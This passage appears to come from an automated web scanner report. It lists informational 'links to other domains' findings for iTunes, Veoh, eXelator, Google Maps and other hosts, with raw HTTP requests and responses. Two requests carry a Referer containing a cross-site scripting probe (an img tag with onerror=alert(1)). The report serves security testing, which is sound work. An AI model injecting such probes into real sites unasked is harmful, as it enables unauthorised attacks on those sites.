<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHSoftware
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...
<div class="app-links"><a rel="nofollow" target="_blank" class="see-all" href="http://www.ea.com/iphone">Electronic Arts Web Site</a><a rel="nofollow" target="_blank" class="see-all" href="http://support.eamobile.com">Dead Space... Support</a>
...[SNIP]...

18.80. http://itunes.apple.com/us/app/the-daily/id411516732  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/the-daily/id411516732

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/app/the-daily/id411516732?mt=8 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:45:32 GMT
x-apple-lok-response-date: Thu Feb 03 09:46:25 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/app/the-daily/id411516732?mt=8
x-apple-application-site: NWK
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:49:32 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?cc=us&id=411516732&mt=8
x-apple-application-instance: 15054
x-apple-lok-path: v0_1:MZStore/viewSoftware&cc=us&id=411516732&mt=8-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:46:25 PST 2011, Expires Thu Feb 03 09:47:25 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:45:32 PST 2011, Expires Thu Feb 03 09:49:32 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=14
Date: Thu, 03 Feb 2011 17:47:11 GMT
Content-Length: 20729
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHSoftware
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...
<div class="app-links"><a rel="nofollow" target="_blank" class="see-all" href="http://www.thedaily.com/contact/">The Daily Support</a>
...[SNIP]...

18.81. http://itunes.apple.com/us/app/wild-about-books/id407309460  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/wild-about-books/id407309460

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/app/wild-about-books/id407309460?mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:47:29 GMT
x-apple-lok-response-date: Thu Feb 03 09:51:14 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/app/wild-about-books/id407309460?mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO
x-apple-application-site: CUP
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:51:29 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?cc=us&id=407309460&mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO
x-apple-application-instance: 541
x-apple-lok-path: v0_1:MZStore/viewSoftware&cc=us&id=407309460&mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:51:14 PST 2011, Expires Thu Feb 03 09:52:14 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:47:29 PST 2011, Expires Thu Feb 03 09:51:29 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=1
Date: Thu, 03 Feb 2011 17:52:13 GMT
Content-Length: 24507
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHSoftware
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...
<div class="app-links"><a rel="nofollow" target="_blank" class="see-all" href="http://www.rhkidsapps.com/wildaboutbooks">Random House Digital, Inc. Web Site</a><a rel="nofollow" target="_blank" class="see-all" href="http://rhlink.com/appsupport">Wild About Books Support</a>
...[SNIP]...

18.82. http://itunes.apple.com/us/artist/the-beatles/id136975  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/artist/the-beatles/id136975

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/artist/the-beatles/id136975?ls=1 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:11 GMT
x-apple-lok-response-date: Thu Feb 03 09:52:14 PST 2011
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewArtist?cc=us&id=136975&ls=1
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/artist/the-beatles/id136975?ls=1
x-apple-application-site: CUP
Content-Type: text/html
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-lok-expire-date: Thu Feb 03 09:56:11 PST 2011
x-apple-application-instance: 1108
x-apple-lok-path: v0_1:MZStore/viewArtist&cc=us&id=136975&ls=1-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:52:14 PST 2011, Expires Thu Feb 03 09:53:14 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:52:11 PST 2011, Expires Thu Feb 03 09:56:11 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Expires: Thu, 03 Feb 2011 17:52:14 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ls=1; version="1"; max-age=30; path=/; domain=.apple.com
X-Apple-Partner: origin.0
Content-Length: 65760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHUberArti
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-previewRegionSensitive.jsz"></script>
...[SNIP]...

18.83. http://itunes.apple.com/us/genre/mobile-software-applications/id36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/genre/mobile-software-applications/id36

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/genre/mobile-software-applications/id36?mt=8 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:50 GMT
x-apple-lok-response-date: Thu Feb 03 09:51:23 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/genre/mobile-software-applications/id36?mt=8
x-apple-application-site: CUP
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:52:50 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewGenre?cc=us&id=36&mt=8
x-apple-application-instance: 6140
x-apple-lok-path: v0_1:MZStore/viewGenre&cc=us&id=36&mt=8-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:51:23 PST 2011, Expires Thu Feb 03 09:52:23 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:48:50 PST 2011, Expires Thu Feb 03 09:52:50 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=9
Date: Thu, 03 Feb 2011 17:52:14 GMT
Content-Length: 17987
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHBrowsePa
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

18.84. http://livechat.boldchat.com/aid/3760177095415339810/bc.chat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://livechat.boldchat.com
Path:   /aid/3760177095415339810/bc.chat

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /aid/3760177095415339810/bc.chat?cwdid=1954365562430760092&wdid=798708614246318013&rdid=1201083812220968228&vr=&vn=&vi=&ve=&vp=&iq=&curl= HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
Set-Cookie: bc-visitor-id=798708614246318013=948822557773872607; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:47:54 GMT
Set-Cookie: bc-visit-id=798708614246318013=9223372036839677808; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=a_SsnwztJaxd; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 19:47:53 GMT
Content-Length: 11752


   <html>
<head>
<HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" />
<!-- Overridable STYLE -->
<STYLE><!--
.print_cell, .email_cell {
   padding: 4px;
}
.email_prompt_box {
...[SNIP]...
<td><a href="http://advertising.superpages.com" target="_blank"><img src="http://www.supermedia.com/img/img-spportal/supermedia/banners/supermedia-logo-whitebg.gif" alt="SuperMedia.com" width="173" height="57" border="0"></a>
...[SNIP]...

18.85. http://ll-appserver.veoh.com/scripts/veoh.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /scripts/veoh.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /scripts/veoh.js?version=AFrontend.5.5.4.1038 HTTP/1.1
Host: ll-appserver.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.0.10.1296766388; __utmc=91933981; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11

Response

HTTP/1.1 200 OK
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset: UTF-8
Age: 370051
Date: Thu, 03 Feb 2011 20:52:26 GMT
Expires: Fri, 26 Jul 2030 05:00:00 GMT
Connection: keep-alive
Content-Length: 247853


var MooTools={'version':'1.2.1','build':'0d4845aab3d9a4fdee2f0d4a6dd59210e4b697cf'};var Native=function(options){options=options||{};var name=options.name;var legacy=options.legacy;var protect=option
...[SNIP]...
<div style="text-align: center; background: #fff;"><iframe id="_cnn_iframe_'+Math.random()+'" src="http://www.cnn.com/video/savp/evp/?loc='+loc_id+'&vid='+vid_id+'" height="393" width="406" allowtransparency="true" frameborder="0" scrolling="no" style="margin: auto;"></iframe>
...[SNIP]...

18.86. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/?p=200&g=512 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxNLaxrASUcFEk%253D; myPAL=eJylkj1PwzAQhv9LvHq4O387U2iEVIlEUALqytiZkfLfubPrtEVVB5iSOM89Pr%252Fnj4w2fx0y9J%252BZQu7Q%252BqRSSqgQrAIPauGXiVeo6w8ZBfOCBXfCAigAZCxAo2iVrdQtmWHMFll0iqIzIWkDFLiIrCvW4WHR2%252Fld76a93jxNehj3UmnXDWK4s4E7Y%252FECixVbGuYZw3iJEYCy0Sv5G25KEKrkrUmiYFXSAgyGz0DqlcBy30dA4RJzvuhSycbqRAEcagICJx8GfX1wDKbGMA589vFlXvS4nR%252B1pMJplIHI4Lz%252Fk09ULdxTsIj%252F0w3Ps6i4w13RyU2w%252BEt3z1CqysUw5yq8rqq9XI%252B8679%252FANW9nC8%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; TFF=eJydlUtywyAMhu%252BSE%252BgBFsIbH6NbL7zoTHftLpO7FzsJJGBcuQsGhvk%252FvSzkObLG63dEihcEN8EAk6rSZZwjxetnxDEtpz5tsB0HHW%252BNHlc9V3pKq%252BYkYzYi7eA6SmltLx%252FL1%252Fyz9GzTsJeGwASAe2lLCSYdW32dtjwdYcVJxmxE2gWMtteYyPleDqHkEO56V%252FQUPItWMYXWU0uiKgv9h2QgEW8lJYM2It05b43q2cRht%252BlDKPqwo28iCq2f8Nr0oW76LrF9U4DJheHYE7WuHpwRSZcAVuvPAiCcK9hDf7ZgCTtTMBROfUK7kWnR646%252BiUxbP3l%252B3TEbsT5kNtreHgkfPK88x1wmtYwAziPAmbkXj0oCvjvHuSa5kAQE9Xvug%252B8uGetGtQbL2PVZk5JBG5Hu2J%252BIKv8ID%252FPBv8huPg3JhTws%252Fjt4%252BwVfmf5g

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDSxNjaxrASUUFEU%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqNsuu2YJ%252FDszdpO2qCoSrPI699i5433BUD4OBdbvhbis0Mdscs5oELyBCGaSm0He0Gp9KKhYVIzDEWMwACgYw0zRIluoazInmK%252ByFAyl4DhbB8QSIh%252Bqtbub7GZ8s9thZ%252B8fB9v1O036ZYHENxYIJyydYalh04xFwTCdYwRgfIpGv%252FJVCUKTvM6SpFiTzAWyk38g80LgZd%252BfgMpl4WLV5dqNt5kYAloCgqAPDmO7SA2u1dB38u%252F98zjZfjM%252BWG1F2qgD0cHF%252BCefquZyj8Ui%252Fk%252FXPY2qkh1uq05PgscfuluGmqoHw51SeJlqe7kcec3psXDpt5wONyDJcL%252B%252BAQnrpp0%253D; expires=Mon, 04-Apr-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlU1ywyAMhe%252BSE%252BgHIoQ3Pka3XmTRme7aXSZ3L3YSSMC4ogsPHuZ96AlL8hKdi9fviBRPCG6GM8yqSqdpiRSvnxGn9Dj1aYHt9azTrdHjqudKT%252BmpOcmYjUgruI5S2rMvH5ev5efSO5tqZEtDYAbAvbSlmEmvrb5OW56BsOIkYzYirQLGs1dP5Hwvh1ByCHe9K3oKnkUrT6GN1JKoykL%252FIRlIxFtJyaCNSHvOW109izjsFn0IRR929I2j0MYJr0Uf6qLvEts3BZhdOB9HojbUgzMiaROg0y7InQtAGLuwh370whI2cmEonOqEdp1p0euOvnGmbZw8v%252B6YjVgbmY1nb03CB%252B2VP4zLpJYRwHkEODP3ElFJwHfnONckF5KAoO7nPvgekrEuVKtZxm7MmpQM2oi0x37AVf4RHuaDf5HdfBqSC3l4%252BQ34GCsed6v%252B0GrmhpN8I4eSfJJDSUrmbMTtF8bmQ6U%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Date: Thu, 03 Feb 2011 20:52:27 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

18.87. http://managedq.com/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.php?q=obama HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13498
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascript"></script>
...[SNIP]...
<center><a href="http://managedq.typepad.com/">Read the Blog</a>
...[SNIP]...
</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="http://www.thumbshots.com"><font size="2" face="Arial, Helvetica, sans-serif" >
...[SNIP]...

18.88. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?hl\x3den\x26tab\x3dwl\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d130dfcdf5e7ca96:TM=1296765176:LM=1296765176:S=H0k57WRX1Ab_GcMi; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
